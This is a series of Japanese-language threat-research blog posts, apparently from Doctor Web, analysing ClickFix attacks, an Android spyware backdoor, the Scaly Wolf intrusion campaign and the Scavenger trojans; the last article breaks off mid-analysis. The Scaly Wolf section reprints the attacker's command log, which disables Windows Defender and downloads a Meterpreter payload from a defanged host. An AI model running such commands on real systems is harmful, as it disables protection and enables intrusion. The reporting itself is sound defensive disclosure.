ClickFix攻撃によるセキュリティインシデントが急激に増加し、世界中で多くのユーザーを不安に陥れています。攻撃者はソーシャルエンジニアリング手法を用いてユーザーを操り、デバイス上で悪意のあるコードを実行させます。

攻撃は、ユーザーが侵害されたサイトや偽サイトにアクセスし、ブラウザのエラーによりWebページを正しく表示できない、あるいは更新が必要であるなどと通知する警告メッセージを目にするところから始まります。

通常、こうしたメッセージには「修正」、「チェック」、「更新」などのボタンが含まれており、ボタンが画面に表示されるやいなや悪意のあるコードが自動的にクリップボードにコピーされます。ユーザーがボタンをクリックする必要すらありません。続けて、ユーザーはこのコードをコマンドプロンプトまたは「実行」ダイアログボックスに貼り付けるよう指示されます。ユーザーが指示に従うと直ちに悪意のあるプログラムがインストールされて起動されます。この操作はユーザー自らが実行するため、多くの場合アンチウイルスによって防ぐことができません。

以下にClickFix攻撃の流れを簡潔に再現します。

ユーザーがコンテンツを読み込んで表示すると、ブラウザに突然警告メッセージが表示されます。メッセージには、最近のブラウザ更新による問題が原因でコンテンツを正しく表示することができないと記載されています。

そして、問題を解決するために次の操作を実行するようユーザーに指示しています。

「Fix it!（修正）」ボタンをクリックする
Windowsのスタートボタンを右クリックする
プログラム一覧でWindows PowerShellを見つけ、管理者権限で開く
右クリックでクリップボードの内容をターミナルウィンドウに貼り付け、コマンドを実行する

ユーザーがボタンをクリックすると、悪意のあるスクリプトがクリップボードにコピーされてターミナルウィンドウで実行されます。

このスクリプトは、攻撃者が侵害したシステムを遠隔操作するために使用するC2インフラストラクチャへのリモート接続を確立します。

この事例では、リモートC2ホストとの接続が確立され、ペイロードがユーザーのデバイス上にダウンロードされます。その後、hostsファイルを改変するよう設計された悪意のある実行ファイルが起動され、実行中のスクリプトが終了します。

Dr.Webには予防的保護テクノロジーが搭載されており、スクリプトが実行ファイルの起動を試みると同時に脅威を検出することが可能です。

ClickFix攻撃で多く使用されるまた別の手口が偽のCAPTCHAです。一見本物のように見えるCAPTCHA認証画面が表示され、その裏で密かに悪意のあるコードがクリップボードにコピーされます。自分は人間であるということを証明しているだけだと信じ込んでいるユーザーが気づかぬうちに悪意のあるコンテンツを操作してしまうため、攻撃の成功率が高まります。

CAPTCHA画面の次に、追加の検証手順を行うよう指示する画面が表示されます。

この手順を完了することでユーザーは知らないうちに悪意のあるスクリプトを実行し、攻撃者にデバイスへのリモートアクセスを提供してしまうことになります。

ClickFix攻撃の検出が難しい理由

ユーザーが偽サイトのボタンをクリックした時点では、アンチウイルスによって悪意のあるパターンは検出されません。この段階では操作はすべて正当なものに見えるからです。ユーザーが自らコマンドをコピー＆ペーストして実行する――システムに対する通常の操作を行っているように見えます。

検出はその後に起こります。すなわち、悪意のあるファイルが起動された、またはスクリプトがシステム内の他のプロセスに悪意のあるコードを挿入しようとした時点です。アンチウイルスはこの時点で脅威を検知し駆除します。言い換えると、マルウェアが他のプロセスに干渉したり怪しい挙動を示したりしてすでにタスクを実行している、いわゆるポストエクスプロイト（post-exploit：エクスプロイト成功後）の段階になって初めて保護テクノロジーがアクションを起こすのです。

通常、この段階で攻撃者はすでに被害者のシステムに接続し、ペイロードを送り込んでいます。そしてペイロードは正規のプロセスに偽装することが可能です。
この段階で攻撃者は以下を実行することができます。

権限を昇格する
データを収集する
ネットワーク内をナビゲートする
アンチウイルスソフトウェアを無効化しようとする

そのうえ、悪意のあるコードは暗号化または難読化されている場合もあり、これが従来のセキュリティルーチンによる検出を、輪をかけて困難なものにしています。

できるだけ早い段階で対処することの重要性

ClickFixによるインシデントでは、攻撃者によるシステムへのリモート接続を阻止することが、実際の脅威に対応することと同じくらい重要です。そのために導入できる追加のセキュリティ対策は以下を参照してください。

ブラウザ上にコマンド（PowerShellスクリプトなど）を含んだ不審なメッセージが表示された場合はクリップボードの内容を確認する
ネットワークトラフィック、ならびにリモート接続を確立しようとする疑わしい試みを分析する
実際の攻撃シナリオを検証することで、ソーシャルエンジニアリングの手口を見破る方法についてユーザーに学んでもらう

ロシア企業の従業員をスパイするAndroidバックドア

Fri, 22 Aug 2025 10:38:38 GMT

2025年8月22日

株式会社Doctor Web Pacific

本記事ではロシア企業を標的として広く拡散されている多機能バックドア Android.Backdoor.916.origin についてお知らせします。このマルウェアは攻撃者から受け取る数々のコマンドを実行することができ、スパイ活動とデータ窃取のための広範な機能を備えています。なかでも特に、会話を盗聴、デバイスのカメラからブロードキャスト、メッセンジャーやブラウザからコンテンツを窃取するほか、キーロガー機能を使用して入力テキスト(パスワードなど)を盗み取ります。

Android.Backdoor.916.origin の最初のバージョンは2025年1月に登場しています。その発見以来、Doctor Webのアンチウイルスラボではこのマルウェアの進化を追い続け複数のバージョンを検出してきました(それぞれのバージョンに関する詳細は該当する「侵害の痕跡」をご確認ください)。 Android.Backdoor.916.origin は不特定のAndroidユーザー間での大量拡散を狙ったものというよりも、むしろ標的型攻撃を目的に設計されている可能性が高いと考えられます。そしてその主たる標的はロシア企業の従業員です。

脅威アクターはメッセンジャーのダイレクトメッセージ(DM)を利用して、「GuardCB」という名のアンチウイルスに偽装したバックドアのAPKファイルを拡散しています。このアプリのアイコンは盾の形をしたロシア連邦中央銀行の紋章に似せたものとなっており、そのうえインターフェースの言語は1つ、すなわちロシア語のみとなっています。つまり、このマルウェアは完全にロシアのユーザーを標的に据えたものであると言えます。このことは、検出された別の亜種に「SECURITY_FSB」や「ФСБ (FSB)」などの名前が付いていたことによっても裏付けられています(「FSB」はロシア連邦保安庁の略称)。これらはロシアの法執行機関と関連があるとうたうセキュリティ関連のプログラムを装っていました。

被害者を欺くためのマルウェアのアイコン

実際には「GuardCB」にアンチウイルスとしての機能は一切搭載されていません。起動されると Android.Backdoor.916.origin はあたかもデバイスのアンチウイルススキャンを実行しているかのように見せかけます。脅威が「検出」される確率はあらかじめプログラムされており、前回の「スキャン」から時間があけばあくほど高くなります。ただし、30%を超えることはありません。「検出された脅威」の数は1～3個の間でランダムに決定されます。

Android.Backdoor.916.origin は初回起動時に多くのアクセス権限を要求します。

位置情報
音声録音
SMS、連絡先、通話履歴、メディアファイルへのアクセス、電話の発信許可
カメラ(写真撮影および動画録画)
バックグラウンドでの実行許可
デバイス管理者権限
アクセシビリティサービス(ユーザー補助機能)

要求される権限の例

次に、 Android.Backdoor.916.origin は自身のサービスをいくつか起動させ、そのアクティビティを1分おきにチェックして必要に応じて再起動させます。このバックドアはこれらのサービスを使用してC2サーバーに接続し、大量のコマンドを受け取ります。以下はそれらコマンドの例です。

受信および送信SMSをC2サーバーにアップロードする
連絡先リストをC2サーバーにアップロードする
通話履歴をC2サーバーにアップロードする
位置情報データをC2サーバーにアップロードする
デバイスのマイクからの音声ストリーミングを開始または停止する
デバイスのカメラからの動画ストリーミングを開始または停止する
デバイス画面のストリーミングを開始または停止する
メモリカードに保存されているすべての画像をC2サーバーにアップロードする
指定された名前の範囲に該当する画像をメモリカードからC2サーバーにアップロードする
指定された画像をメモリカードからC2サーバーにアップロードする
バックドアの自己保護機能を有効化または無効化する
受信したシェルコマンドを実行する
デバイスのネットワークとインターフェースに関する情報をC2サーバーにアップロードする

Android.Backdoor.916.origin は収集したデータを種類ごとにそれぞれ異なるC2サーバーポートにストリーミングします。

また、 Android.Backdoor.916.origin はアクセシビリティサービス(ユーザー補助機能)を使用してキーロガー機能を実行し、メッセンジャーやブラウザから内容を盗み取ります。このトロイの木馬が監視するのは以下のアプリです。

Telegram
Google Chrome
Gmail
Яндекс Старт (Yandex Start)
Яндекс Браузер (Yandex Browser)
WhatsApp

そのうえ、脅威アクターから該当するコマンドを受け取った場合は同サービスを使用して自らを削除から保護する機能も備えています。

Android.Backdoor.916.origin は多数のC2サーバーと連携して動作することができ、それらの情報はトロイの木馬の設定内に保存されています。さらにホスティングプロバイダを切り替えることも可能で、その数は15にも上ります。ただし、この機能は現時点では使用されていません。Doctor Webは確認された侵害についてドメインレジストラに報告を行いました。

Dr.Web Security Space for mobile devicesは Android.Backdoor.916.origin の既知の亜種をすべて確実に検出し、削除します。そのため、Dr.Webユーザーに危害が及ぶことはありません。

Android.Backdoor.916.origin の詳細 ※英語

Indicators of compromise(侵害の痕跡) ※英語

テイク2 : ロシアの機械工学系企業の機密情報を執拗に狙うScaly Wolf

Thu, 21 Aug 2025 12:34:37 GMT

2025年8月21日

株式会社Doctor Web Pacific

2023年、Doctor Webのエキスパートはロシアの機械工学系企業を狙った標的型攻撃に関する調査を開始し、その結果をレポートとして公開しました。サイバー犯罪者はこの企業の機密情報に対して並々ならぬ関心を寄せているものとみられ、最初の攻撃から2年が経過した今、再び新たな攻撃が確認されました。脅威アクターは新たなマルウェアを手に、同企業のITインフラストラクチャに侵入せんとする強い執念に燃えて戻ってきたのです。今回の攻撃では標的のコンピューターを感染させるために複数の攻撃ベクトルが用いられています。

序論

2025年6月末、Doctor Webはロシアの機械工学系企業の担当者から連絡を受けました。その内容は、コンピューターの1台で頻繁に脅威が検出されているが感染を示唆するものなのか、それともなんらかの不具合によるものなのか調べてほしいというものでした。この件について調査を行った結果、アンチウイルスの動作は正常であり、同企業は標的型攻撃を受けていたということが明らかになりました。

攻撃はDr.Webアンチウイルスのインストールされていないコンピューターから始まっていました。このコンピューターのセキュリティ対策が不十分だったことでネットワークが侵害され、さらに何台かのデバイスを感染させてしまう結果となったのです。Doctor Webのスペシャリストは影響を受けたワークステーションの分析を行い、一連のイベントを再現しました。本稿では、脅威アクターが攻撃に用いた感染経路と手法について解説します。

攻撃および使用されたツールに関する全般的情報

2025年5月の初め、標的となった企業に金融関連を装ったメールがたて続けに届くようになりました。メールにはフィッシングPDFドキュメントとパスワード保護されたZIPアーカイブが含まれていました。

メールの1つに添付されていたおとりのPDFとZIPアーカイブ

メール自体には本文はありません。

フィッシングメールの例

おとりのPDFドキュメントには、添付のアーカイブに「金融関連文書」が含まれており、それを解凍するにはドキュメント内に記載されているパスワードを使用する必要があるという内容が記されています。このフィッシングPDFのデザインはさまざまで、必要最低限のシンプルなものもあれば、可能な限り公式文書に似せたものもありました。

シンプルな例 :

公式文書を模した例 :

アーカイブ内のファイルは実際には実行ファイルでしたが、「二重」拡張子(Акт Сверки.pdf.exe)を付けることでPDFファイルに偽装されていました。Windowsでは、ユーザーにとって煩わしくないようデフォルトで拡張子が表示されないようになっています。ファイルに「二重」拡張子が付いている場合は2つ目の拡張子のみが非表示になるため、ユーザーには本来の拡張子が表示されず無害なファイルであるように見えるのです。

Doctor Webのアンチウイルスラボは2025年5月6日にこのような悪意のあるメールの最初の検体を受け取り、 Trojan.Updatar.1 がウイルスデータベースに追加されました。 Trojan.Updatar.1 はモジュール型バックドアUpdatarによる感染の第一段階を担っており、感染チェーンを進行させる別のコンポーネントを標的のシステムにダウンロードするよう設計されています。このバックドアは感染させたコンピューターから機密データを収集する目的で用いられています。

Trojan.Updatar.1 は新しいマルウェアではないということに触れておく必要があります。このマルウェアの最初の検体がDoctor Webのエキスパートの目を引いたのは1年前のことでした。しかしながら、 Trojan.Updatar.1 によってダウンロードされる感染チェーンのその先のステップを入手することはかないませんでした。それらはC2サーバーから自動的にダウンロードされるのではなく、サーバーを操作する人物から直接コマンドを受け取ることでダウンロードされていたためです。今回の Trojan.Updatar.1 を用いたアクティブな攻撃に関する調査によって、これまで欠けていたこのダウンローダの残りのピースを追跡することが初めて可能となったのです。

このたび検出された新たなバージョンを調査した結果、 Trojan.Updatar.1 の機能は最初の発見以来さほど大きく変更されていないことが明らかになりました。ただし、解析をより困難にするためのユニークな難読化が実装されています。この難読化手法はDoctor Webのウイルスアナリストにより「RockYou Obfuscation(RockYou難読化)」と名づけられました。この難読化の要となる特性は、辞書ファイル(ワードリスト)RockYou.txtに含まれる文字列がトロイの木馬の本体内で常に初期化されるというものです。これらの文字列を使用して、プログラムのメイン機能に影響を及ぼさないさまざまな操作が実行されます。一方、プログラムの動作に直接関連する文字列はXOR演算と小さなオフセットによってエンコードされています。このXOR演算とオフセットに使用されるキーは Trojan.Updatar.1 の検体ごとにランダム化されています。

RockYou.txtはよく使われるパスワード3,000万以上を収録したリストで、過去に発生した重大な情報漏えいが元となって作成されています。コンピューターシステム保護の信頼性をテストするためにセキュリティスペシャリストによって使用されるだけでなく、アカウントをハッキングする目的で悪意のあるアクターによっても使用されます。

以下の画像は、トロイの木馬で使用されている難読化とRockYou辞書内にある対応する単語の例です。

以下の図は攻撃の進行を時系列で示したものです。

1台目のコンピューターに対する攻撃

今回の標的型攻撃で最初のコンピューターが感染したのは2025年5月12日、すなわち特定された Trojan.Updatar.1 の亜種がDoctor Webのウイルスデータベースに追加されてから約1週間後のことでした。標的となったコンピューターにDr.Webアンチウイルス保護が導入されていなかったというただそれだけのことが感染を招いたのです。そして、悪意のあるメールの1つに含まれてトロイの木馬が送り込まれ、ユーザーが「ドキュメント」を開くことで難なく起動しました。感染から1時間後、このトロイの木馬 Trojan.Updatar.1 によってシステム内に別のバックドアコンポーネント Trojan.Updatar.2 と Trojan.Updatar.3 がダウンロード、インストールされました。

5月14日、攻撃者は Trojan.Updatar.3 を使用して、shell.exeをダウンロードするためのBITSサービスタスクをコンピューター上にインストールしました。 shell.exeはMeterpreterツールの本体をダウンロードするためのシェルコードを含むプログラムで、Meterpreterはコンピューターシステムのセキュリティテストに使用されるMetasploitに含まれるバックドアユーティリティです。

次に、Trojan.Updatar.3 モジュールの1つ(FileManager.exe)がシステムにインストールされました。このモジュールはコンピューターへのファイルのアップロードやダウンロードを担っており、感染させたシステムからファイルを盗む目的で使用されていました。

その後、攻撃者はLSASSプロセスをダンプするよう設計されたユーティリティ Tool.HandleKatz を使用してWindowsユーザーのアカウントデータを取得し、続けて、リモートデスクトッププロトコル(RDP)経由でより簡単にシステムにログインするためのツールRDP Wrapper(Program.Rdpwrap.7) をインストールしました。そのほかに、トラフィックをトンネリングするためのユーティリティ Tool.Chisel と Tool.Frp もインストールされています。

2台目のコンピューターに対する攻撃

2台目となるコンピューターの侵害は2025年5月14日に開始されました。攻撃者は最初に感染させたコンピューターのメモリから窃取したアカウントデータを使用して社内ネットワークにアクセスし、この2台目のコンピューターがさらなる侵入に適しているかどうかを判断するためにリモートからシステム上でコマンドを実行しています。

それから1週間以上が経過した5月23日、悪意のあるアクターは同コンピューター上にBITSサービスタスクをインストールして Trojan.Updatar.1 をダウンロードさせました。しかしながら、このコンピューターにはDr.Webアンチウイルスがインストールされていたため、トロイの木馬の起動はブロックされました。

5月29日、攻撃者は再び社内ネットワークを利用してリモートで同コンピューターにアクセスし、手動で Trojan.Updatar.2 と Trojan.Updatar.3 をインストールすることでシステム内での足がかりを得ることに成功しています。

2025年6月3日には別のBITSサービスタスクを使用してMeterpreterバックドアがインストールされました。

3台目のコンピューターに対する攻撃

3台目のコンピューターへの侵入の糸口となったのは窃取されたリモートデスクトップサービス(RDP)のユーザー認証情報です。RDPのユーザー認証情報を入手した攻撃者は、2025年6月23日、その侵害されたRDPアカウントを使用してコンピューターへの接続を開始しました。次に、システム内での足がかりを得てリモートシェルにアクセスするためにMetasploit Frameworkに含まれる標準ツールの1つを起動させ、このツールを介してPowerShellスクリプトとしてペイロードを実行しようと試みています。しかしながら、このコンピューターにインストールされていたDr.Webアンチウイルスによってその動作はブロックされ、実行試行は DPC:BAT.Starter.613 として検出されました。

この悪意のあるスクリプトは、2つ目のPowerShellスクリプトを含むbase64エンコードされたデータを解凍し、それを実行するはずでした。2つ目のスクリプトにはPowerShell アドレス空間で実行されるbase64エンコードされたシェルコードが含まれています。

この一連のスクリプト実行によって、アドレス77[.]105[.]161[.]30からMeterpreterバックドアをシステム内にダウンロードするための最初の段階が開始されます。

スクリプト実行による侵入の試みがアンチウイルスによって阻止された後、悪意のあるアクターはMetasploit Frameworkに含まれる標準ツールの使用に見切りをつけ、別の手段、すなわちRemComツールを使用するようになりました。このツールはDr.WebアンチウイルスによってProgram.RemoteAdmin.877 として検出されますが、今回のケースではブロックはされていません。RemComは標準的なリモート管理ツールであり、アンチウイルスのデフォルト設定ではそのようなツールの実行が許可されているからです

攻撃者はこのツールを使用して次のコマンドを実行しています。


    ipconfig
    powershell  -Command "Set-MpPreference -MAPSReporting 0"
    powershell  -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    powershell  -Command "Add-MpPreference -ExclusionPath 'C:\'"
    powershell  -Command "Get-MpPreference | Select -ExpandProperty ExclusionPath"
    powershell  -Command "Set-MpPreference -MAPSReporting 0"
    tasklist
    reg  add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    powershell  -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    chcp
    wmic  service where "name='DrWebAVService'" get PathName
    reg  query "HKLM\SOFTWARE\DrWeb" /v Version
    wmic  product where "name like 'DrWeb%'" get Name, Version
    sc  qc DrWebAVService
    reg  query "HKLM\SOFTWARE\WOW6432Node\DrWeb" /v Version
    tasklist
    findstr  /i drweb
    findstr  /i dr
    findstr  /i drw
    findstr  /i drs
    findstr  /i dws
    wmic  product where "name like 'Dr.Web%'" get Name, Version
    reg  query "HKLM\SOFTWARE\WOW6432Node\Dws" /v Version
    netstat  -a -o -n
    powershell  -Command "bitsadmin /transfer "DownloadJob" "hxxps[:]//roscosmosmeet[.]online/shellcode.exe" "$env:USERPROFILE\Pictures\zabix.exe""
    
    
    powershell  -Command "Get-MpComputerStatus"
    powershell  -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct"
    tasklist
    findstr  /i drweb
    sc  query
    findstr  /i drweb
    cmd: installer.exe

コンピューター上にインストールされているアンチウイルスソフトウェアを特定し、システム内に足場を築くためのポイントをいくつかインストールしようと試みています。

shellcode.exe — Meterpreterの亜種の1つ(BackDoor.Shell.244)で、シェルコードによってそこにMeterpreter本体がダウンロードされます。
installer.exe — Trojan.Updatar.1.

これらの試みもすべてDr.Webアンチウイルスによって検出され、ブロックされました。

マルウェアと攻撃者のインフラストラクチャの特徴

今回の標的型攻撃で用いられた悪意のあるプログラムの操作には、複数のC2サーバーが使用されていた。ただし、マルウェアのダウンロード元としては主にドメインroscosmosmeet[.]onlineが使用されていた
Meterpreterバックドアツールのすべての亜種はIPアドレス 77[.]105[.]161[.]30にリンクされ、異なるポートにアクセスしていた。
モジュール Trojan.Updatar.3 のすべての亜種は通信にドメインupdating-services[.]comを使用していた。

モジュール Trojan.Updatar.1 と Trojan.Updatar.2 はバージョンに応じてドメインadobe-updater[.]netまたはupdatingservices[.]netを使用していた。

攻撃の背後にいるのは誰か

複数のマルウェア検体から収集されたアーティファクト(痕跡)により、今回の攻撃を仕掛けたAPTグループを特定することに成功しました。アーティファクトは次の場所で発見されています。

モジュール Trojan.Updatar.3 の亜種内
脅威アクターのインフラストラクチャ解析中に発見された偽アプリ内(ただし、今回の攻撃キャンペーンでは使用されず)

そのほか、同企業に対する前回の標的型攻撃で使用されていた悪意のあるプログラムの1つでも発見されています。

このすべてのアーティファクトが示していたのが、これら悪意のあるツールはScaly Wolfグループと直接関連のある同じ開発者によって作成されているということでした。

2年前同様、Scaly Wolfグループはシステム内に足がかりを得て偵察を行うために独自のモジュール型バックドアを用いています。前回の攻撃と異なっているのは、今回の攻撃キャンペーンではコンピューターへの最初のアクセスにMaaS(Malware as a Service : サービスとしてのマルウェア)トロイの木馬が使用されていないという点です。

また、今回の攻撃ではポストエクスプロイト(post-exploitation)とシステム内での足場固めに標準的なツールが使用されるようになっています。

トラフィックをトンネリングするためのさまざまなオープンソースツール
Metasploitフレームワーク
PCにリモートアクセスするためのさまざまなプログラム

Scaly Wolfグループに見られるもう1つの特徴は、マルウェアを含んだメールをMail.ruサービスに登録されたメールアドレスから送信しているというものです。

攻撃者のツール

先に述べたとおり、Updatarバックドアのインフラストラクチャ解析中にDoctor Webのスペシャリストは悪意のある偽アプリを複数発見しました。それらに加えて、トロイの木馬 Trojan.Uploader.36875 と BackDoor.Siggen2.5423 も発見されています。これらは今回の攻撃では使用されていませんが、Scaly Wolfグループによる他の攻撃キャンペーンで用いられている可能性があります。

Trojan.Uploader.36875 は感染させたコンピューターから盗み取ったファイルを攻撃者のサーバーに送信するよう設計されており、 BackDoor.Siggen2.5423 はVNC経由でコンピューターを遠隔操作することを可能にします。そして偽アプリが、被害者をだまして操るためのさまざまなメッセージウィンドウを表示させます。これらの偽アプリはコンピューターに直接的な危害を与えるわけではありませんが、悪意のあるアクターが攻撃を実行するうえでの一翼を担っています。以下の画像は表示される偽のメッセージウィンドウの例です。

セキュリティソフトウェアの削除に関する偽のメッセージ :

スキャンが完了し脅威が削除されたことを知らせる、Windows標準搭載のウイルス対策ソフトを装った偽のメッセージ :

「Windowsの動作を安定させる」ためにシステム設定を適用する必要があると通知する偽のメッセージ :

実際には、偽アプリはコマンド引数を受け取り、ユーザーがメッセージウィンドウ内の「OK」ボタンをクリックすると指定されたアプリを起動させる仕掛けになっています。

以下はScaly Wolfグループが使用するツールとマルウェアのリストです :

Trojan.Updatar.1
Trojan.Updatar.2
Trojan.Updatar.3
Trojan.Uploader.36875
BackDoor.Siggen2.5423
BackDoor.Shell.244 (Meterpreter)
BackDoor.Meterpreter.259
Program.RemoteAdmin.877 (RemCos)
Tool.HandleKatz
Tool.Chisel
Tool.Frp

Updatarバックドアとそのコンポーネントの詳細な技術的情報については、本調査レポートのPDFバージョンまたはDoctor Webウイルスライブラリを参照してください。

Trojan.Updatar.1 の詳細 ※英語
Trojan.Updatar.2 の詳細 ※英語
Trojan.Updatar.3 の詳細 ※英語
Trojan.Uploader.36875 の詳細 ※英語
BackDoor.Siggen2.5423 の詳細 ※英語

結論

標的型攻撃は依然として企業にとって深刻な情報セキュリティ脅威となっています。本稿で分析した事例から、脅威アクターは情報システムにアクセスするために創意工夫を凝らした柔軟な手法を駆使していることが分かります。ハッカーが利用する侵入経路は多岐にわたります。フィッシングメール、脆弱性の悪用、アンチウイルス保護の導入されていないコンピューター、そしてリモート管理ツールなどアンチウイルスがデフォルトで実行を許可しているソフトウェアを悪用するケースさえみられます。

つまり、セキュリティソリューションがインストールされている場合であっても、攻撃者はそれらを回避しようとしてくる場合があるのです。より強固な保護を確実なものにするため、社内コンピューター上のアンチウイルスを慎重に設定し、デフォルト設定を残さないようにすることが推奨されます。また、脆弱性を悪用されることによる感染のリスクを低減するために、利用可能なすべてのOSおよびソフトウェアのアップデートをインストールするようにしてください。

MITREマトリックス

Stage(段階)	Technique(技術・手法)
Initial access(初期アクセス)	Phishing(フィッシング) : T1566
Execution(実行)	User execution(ユーザーによる実行) : T1204 Software Deployment Tools(ソフトウェア展開ツール) : T1072
Persistence(永続化)	BITS Jobs(BITSジョブ) : T1197 Modify Registry(レジストリの変更) : T1112 Boot or Logon Autostart Execution(ブートまたはログオン時の自動実行) : T1547
Detection prevention(防御回避)	Obfuscated Files or Information(難読化されたファイルや情報) : T1027
Data collection(データ収集)	Data from Local System(ローカルシステムのデータ) : T1005 Screen Capture(スクリーンキャプチャ) : T1113
Command and control(コマンド・アンド・コントロール)	Web Protocols(Webプロトコル) : T1437.001 Encrypted Channel(暗号化チャンネル) : T1573

Indicators of compromise(侵害の痕跡) ※英語

備えよゲーマーたち：チートやmodに偽装した、仮想通貨やパスワードを盗むScavengerトロイの木馬

Fri, 25 Jul 2025 13:16:35 GMT

2025年7月25日

株式会社Doctor Web Pacific

Doctor Webのウイルスラボは、Windowsユーザーの仮想通貨ウォレットやパスワードマネージャーから機密データを盗む目的で脅威アクターによって使用される、悪意のあるアプリファミリーTrojan.Scavengerを検出しました。脅威アクターはこのファミリーに属する複数のトロイの木馬を連鎖的に組み合わせ、DLL検索順序ハイジャッキング(DLL Search Order Hijacking)脆弱性を悪用してペイロードを実行し、データを窃盗します。

序論

2024年、Doctor Webはロシア企業に対する標的型攻撃の実行を試みた情報セキュリティインシデントについて調査を行いました。その攻撃手法の一環として、一般的なWebブラウザのDLL検索順序ハイジャッキング脆弱性を悪用するマルウェアが使用されていました。Windowsアプリケーションは、起動されるとその正常な動作に必要なすべてのライブラリを複数のディレクトリから特定の順序で検索します。そこで、アプリを「騙す」ために攻撃者は悪意のあるDLLファイルを最初に検索される場所(アプリのインストールディレクトリなど)に配置します。さらに、このファイルには検索優先順位の低いディレクトリにある正規ライブラリと同じ名前が付けられています。その結果、脆弱なアプリが起動されると悪意のあるDLLファイルが最初に読み込まれるようになります。そしてこの悪意のあるライブラリはアプリの一部として動作し、アプリと同じ権限を取得します。

件のインシデントを踏まえ、Dr.Webアンチウイルス製品にはDLL検索順序ハイジャッキング脆弱性を悪用する試みをトラッキングし、阻止する機能が搭載されるようになりました。この機能のテレメトリデータ解析中にDoctor Webのウイルスアナリストは複数のクライアントのブラウザに未知のマルウェアをダウンロードしようとする試みを検出し、それらの事例について調査を行う中で新たなハッカーキャンペーンの進行が浮かび上がってきました。本記事ではそのキャンペーンについて解説していきます。

悪意のあるプログラム Trojan.Scavenger は、さまざまな方法で標的のシステム内に侵入するダウンローダ型トロイの木馬から始まる多段階プロセスでコンピューターを感染させます。このキャンペーンでは、使用されているトロイの木馬コンポーネントの数が異なる2つの感染チェーンが展開されていることがDoctor Webのスペシャリストによって特定されました。

3つのローダーを用いたチェーン

この感染チェーンを開始するコンポーネントは動的ライブラリ(DLLファイル)であるマルウェア Trojan.Scavenger.1 です。このマルウェアは海賊版ゲームの一部として、あるいはさまざまなパッチやチート、modに偽装して、Torrent(トレント)やゲーム関連サイトを通じて拡散されます。ここでは、パッチに偽装したトロイの木馬の例をみてみます。

まず、Trojan.Scavenger.1 がインストール手順と共にZIPアーカイブに含まれて配信されます。このインストール手順内で、攻撃者はパフォーマンスを向上させるためと称して「パッチ」をゲーム『Oblivion Remastered』のディレクトリ内に配置するようユーザーに促しています。

Drag umpdc.dll and engine.ini to the game folder:
\steamapps\common\Oblivion Remastered\OblivionRemastered\Binaries\Win64
 
Engine.ini will automatically be loaded by the module.
The module will also apply some native patches to improve performance

悪意のあるファイルに umpdc.dll という名前が付けられているのには理由があります。同じ名前の正規ファイルがWindowsのシステムディレクトリ %WINDIR%\System32 に存在するためです。これはさまざまなプログラムによって使用されるグラフィックスAPIの一部で、ゲームでもこれが使用されます。ユーザーのゲームがパッチ未適用の脆弱性を持つバージョンであった場合、コピーされたトロイの木馬ファイルもゲームと一緒に自動的に起動されます。ここで注目に値するのは、ゲーム『Oblivion Remastered』の調査時点での最新バージョンは umpdc.dll ファイルのライブラリ検索順序を正しく処理していたということです。そのため、この例では Trojan.Scavenger.1 はゲームと同時に自動起動することができず、感染チェーンを進めることはかないませんでした。

起動に成功した場合、トロイの木馬はリモートサーバーから悪意のあるダウンローダ Trojan.Scavenger.2 (tmp6FC15.dll) をダウンロードし、次の段階を開始します。この Trojan.Scavenger.2 が同じファミリーに属する別のモジュール Trojan.Scavenger.3 と Trojan.Scavenger.4 をダウンロードしてシステム内にインストールします。

Trojan.Scavenger.3 は標的となるChromiumベースのブラウザのディレクトリ内にコピーされる動的ライブラリ version.dll です。このファイルの名前は %WINDIR%\System32 ディレクトリにあるシステムライブラリの1つと同じです。DLL検索順序ハイジャッキング脆弱性を持つブラウザはこの名前のライブラリがどこから読み込まれるかをチェックしません。そしてトロイの木馬ファイルがブラウザのディレクトリに置かれているために、正規のシステムライブラリよりも優先されて最初に読み込まれます。Doctor WebのウイルスアナリストはGoogle Chrome、Microsoft Edge、Yandex Browser、Operaのブラウザでこの脆弱性を悪用する試みを検出しました。

起動されると、Trojan.Scavenger.3 は標的ブラウザの保護メカニズム(サンドボックスの起動など)を無効化し、JavaScriptコードが分離環境ではなくメインメモリ領域内で実行されるようにします。また、Trojan.Scavenger.3 はブラウザ拡張機能の検証も無効化します。そのために、まずエクスポート関数 CrashForExceptionInNonABICompliantCodeRange を探すことで、この関数が含まれているChromiumライブラリを見つけ、次にそのライブラリ内で拡張機能検証手順を検索してパッチを適用します。

その後、トロイの木馬は必要な改変をC2サーバーからJavaScriptコードの形で受け取り、ブラウザにインストールされている目的の拡張機能に変更を加えます。改変の標的となったのは次の仮想通貨ウォレットとパスワードマネージャーです。

仮想通貨ウォレット
- Phantom
- Slush
- MetaMask
パスワードマネージャー
- Bitwarden
- LastPass

この場合、改変されるのはオリジナルファイルではなく、トロイの木馬によってあらかじめディレクトリ %TEMP%/ServiceWorkerCache に置かれていたコピーファイルです。改変された拡張機能をブラウザに「取得」させるため、Trojan.Scavenger.3 は CreateFileW および GetFileAttributesExW 関数をフックし、オリジナルファイルへのローカルパスを改変されたファイルへのパスに置き換えます(Dr.Webは後者を Trojan.Scavenger.5 として検出します)。

改変には次の2つのパターンがあります。

Cookieにタイムスタンプが追加される
ユーザーデータをC2サーバーに送信するルーチンが追加される

仮想通貨ウォレットPhantom、Slush、MetaMaskからはニーモニックフレーズ(mnemonic phrases)が攻撃者に送信され、パスワードマネージャーBitwardenとLastPassからはそれぞれ認証Cookieとユーザーが追加したパスワードが送信されます。

一方、Trojan.Scavenger.4 (profapi.dll)は仮想通貨ウォレットExodusがインストールされているディレクトリにコピーされます。このトロイの木馬もDLL検索順序ハイジャッキング脆弱性を悪用してアプリと同時に自動的に起動します(正規システムライブラリ profapi.dll はディレクトリ %WINDIR%\System32 に置かれていますが、脆弱性によりウォレット起動時にはトロイの木馬ファイルが優先して読み込まれます)。

